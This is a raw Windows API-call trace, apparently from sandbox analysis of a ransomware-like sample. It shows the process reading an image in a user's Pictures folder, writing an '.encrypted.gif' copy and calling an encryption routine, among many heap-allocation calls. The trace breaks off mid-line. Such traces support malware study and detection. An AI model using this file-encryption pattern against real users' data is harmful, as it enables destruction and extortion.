[0040.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\uruf9ajfh14ze.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.010] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.010] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.010] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.011] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c95d0 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0040.012] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.013] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\Uruf9aJfh14ZE.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\uruf9ajfh14ze.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.013] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.013] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.013] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0040.013] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.014] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.014] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xfbf7, lpOverlapped=0x0) returned 1 [0040.017] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfbf7) returned 0xac2018 [0040.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0040.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.018] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfbf7) returned 0xad1c18 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.019] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.019] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfbf7) returned 0xac2018 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.019] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.020] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.020] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.020] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfbf7) returned 0xac2018 [0040.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0040.020] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0040.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfbf7) returned 0x935008 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.023] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 1 [0040.023] TranslateMessage (lpMsg=0x6ae83c) returned 0 [0040.023] DispatchMessageW (lpMsg=0x6ae83c) returned 0x0 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.023] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6aded8) returned 1 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.024] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0040.024] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0040.024] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.024] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0040.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0040.024] RtlAllocateHeap 